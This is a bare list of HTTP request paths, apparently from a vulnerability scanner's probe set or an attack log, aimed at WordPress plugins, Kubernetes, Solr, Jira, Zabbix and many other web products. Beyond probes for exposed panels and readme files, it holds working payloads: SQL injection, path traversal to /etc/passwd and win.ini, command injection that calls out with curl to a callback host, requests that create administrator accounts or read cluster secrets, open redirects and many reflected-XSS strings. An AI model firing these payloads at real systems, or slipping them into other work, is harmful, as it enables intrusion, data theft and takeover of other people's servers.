/horde/admin/user.php
/admin/user.php
/CMSInstall/install.aspx
/wp-content/plugins/chained-quiz/readme.txt
/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-
/wp-json/visualizer/v1/upload-data
/query?db=db&q=SHOW%20DATABASES
/api/experimental/latest_runs
/console/login/LoginForm.jsp
/dashboard/view-chair-list.php?table_id=
/wp-content/plugins/tutor/readme.txt
/wp-content/plugins/filebird/readme.txt
/wp-content/plugins/polls-widget/readme.txt
/wp-admin/admin-ajax.php?action=get_question&question_id=1%20AND%20(SELECT%207242%20FROM%20(SELECT(SLEEP(4)))HQYx)
/wp-content/plugins/wc-multivendor-marketplace/readme.txt
/wp-content/plugins/registrations-for-the-events-calendar/readme.txt
/wp-content/plugins/wpdatatables/readme.txt
/oam/server/opensso/sessionservice
/wp-content/plugins/ulisting/README.txt
/about_state
/wan.htm
/wp-content/plugins/wp-statistics/readme.txt
/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}
/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo
/wp-content/plugins/photo-gallery/readme.txt
/plugin
/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test
/api/agent/tabs/agentData
/cgi-bin-hax/ExportSettings.sh
/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL
/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ==
/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd
/mbilling/lib/icepay/icepay.php?democ={{randstr}};curl%20{{interactsh-url}};#
/wp-content/plugins/contus-video-gallery/readme.txt
/ws/v1/cluster/apps/new-application
/ipython/tree
/lab/api/settings/
/pods
/api/v1/pods
/wp-content/plugins/leaguemanager/readme.txt
/images/json
/nacos/v1/auth/users?pageNo=1&pageSize=9
/v1/auth/users?pageNo=1&pageSize=9
/wp-content/plugins/notificationx/README.txt
/wp-content/plugins/notificationx-pro/README.txt
/web/database/manager
/goforms/menu
/admin/group/x_group.php?id=1
/wp-content/plugins/wp-advanced-search/readme.txt
/wp-content/plugins/wp-fastest-cache/readme.txt
/wp-content/plugins/zero-spam/readme.txt
/solr/
/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true
/wp-admin/tools.php?content=&wp-attachment-export-download=true
/command/prima-factory.cgi
/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini
/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini
/verify.php?id=1&confirm_hash=
/mantis/verify.php?id=1&confirm_hash=
/mantisBT/verify.php?id=1&confirm_hash=
/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/bugs/verify.php?confirm_hash=&id=1
/debug/pprof/
/debug/pprof/goroutine?debug=1
/WealthT24/GetImage?docDownloadPath=/etc/passwd
/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini
/files/ldap.debug.txt
/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image
/file?valore=../../../../../windows/win.ini
/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/cmscp/ext/collect/fetch_url.do?url=https://oast.live
/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd
/components/statestore
/overview
/controlplane
/public/ticket/ajax/ajax.php?action=getContacts&email=%
/../../../../etc/passwd
/lang/log/httpd.log
/setup/setup-datasource-standard.jsp
/param.file.tgz
/admin/lipinadd.asp
/_config
/api/security/ticket
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
/cgi-bin/cgibox?.cab
/cgi-bin/cgibox?/nobody
/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
/?query=SHOW%20DATABASES
/__clockwork/latest
/api/v1/GetSrc
/api/v1/GetDevice
/jbossmq-httpil/HTTPServerILServlet/
/solr//..;/
/wps/proxy
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini
/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/self.key
/git/notifyCommit?url={{randstr}}&branches={{randstr}}
/druid/index.html
/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties
/v2/auth/roles
/cloudstore/system/#/sys?_k=2lnfbk
/users/sign_in
/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails
/dgn/dgn_tools/ping.php?ipdm=2;id;
/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=%27
/pipeline/apis/v1beta1/runs?page_size=5&sort_by=created_at%20desc
/main_details/client.asp
/ADSearch.cc?methodToCall=search
/ajax-api/2.0/preview/mlflow/experiments/get?experiment_id=0
/pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd
/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini
/applications.pinpoint
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
/prod-api/druid/websession.html
/admin/
/solr/admin/
/index.php?page=/etc/passwd
/home
/dashboard
/v2/keys/
/hoteldruid/inizio.php
/inizio.php
/upgrade.php
/wifi_base.shtml
/#/alerts
/backend/admin/users?username=anonymous
/Default.aspx
/mongo-express/
/db/admin/system.users
/sensorlist.htm
/data/plugins_listing
/config.json
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
/SSI/Auth/ip_snmp.htm
/hp/device/webAccess/index.htm?content=security
/UserSelect/
/wp-content/themes/CherryFramework/admin/data_management/download_backup.php
/wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin.php?page=wps_pages_page&type=1&ID=1+AND+(SELECT+*+from+(select+SLEEP(6))a)
/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E
/
/PRESENTATION/EPSONCONNECT
/cgi-bin/home
/browser/
/aura
/s/sfsites/aura
/sfsites/aura
/s/aura
/s/fact
/ui/index.html
/config.html
/grid/console
/console
/static/
/wp-admin/admin-post.php
/unified-console.html
/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com
/?dev
/_cat/indices?v
/_all/_search
/?pretty
/ws/v1/cluster/info
/chpstrt.php?chppath=Home
/web-console/ServerInfo.jsp
/graphs/
/?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ==
/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo
/api/system
/cgi-bin/log.cgi
/seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&
/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e
/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>
/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/AdminTools/querybuilder/logonform.jsp
/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh
/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>
/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login
/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>
/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test
/Runtime/Data/ms_admin.php
/wp-json/ssa/v1/users
/wp-admin/admin-ajax.php?action=directorist_author_pagination
/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small
/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or
/index.php?userName=%22%3E%3Cscript%3Econfirm(1)%3C/script%3E
/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d
/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/print.php?nm_member=<script>alert(document.location)</script>
/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number=
/find-a-matchpksyk
/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1
/search?filtered=1&q=test&filter[price]=100-1331
/search?filter[brandid]=vnxjb
/explore/repos
/conf
/api/v1/cluster/summary
/apps
/cgi-bin/nobody/Search.cgi?action=scan
/listconf?command=conf
/speedtest?url={{interactsh-url}}
/net/net/net.html
/ui/login
/cucm-uds/users
/shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/app/kibana/
/login
/go/admin/pipelines/create?group=defaultGroup
preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a
/h2-console/login.jsp
/iproperty/property-views/all-properties-with-map?filter_keyword=pihil%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22f63m4&option=com_iproperty&view=allproperties&ipquicksearch=1
/?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po%3Cimg%20src=a%20onerror=alert(document.domain)%3Evh217
/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k
/api/stats
/horizon/api/stats
/shop/products?category=cordless-tools&min=1026553%3balert(document.domain)%2f%2f772
/sidekiq
/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd
/index.php?page=jobs&category=1&lrw3e%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22k1n44=1
/settings
/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay
/ui/clusters/kafka-ui/brokers
/dashboard.aspx
/overview.html
/templates/config/profmanage.php
/v1/submissions
/wp-content/backups-dup-lite/tmp/
/wp-content/backups-dup-lite
/api/v1/data?chart=system.cpu&format=json&points=125&group=average&gtime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait
/%3Cscript%3Ealert(document.domain)%3C/script%3E
/?wptouch_switch=desktop&redirect=http://interact.sh
/zabbix/zabbix.php?action=dashboard.list
/zenphoto/zp-core/setup/index.php
/zp/zp-core/setup/index.php
/gallery/zp-core/setup/index.php
/zp-core/setup/index.php
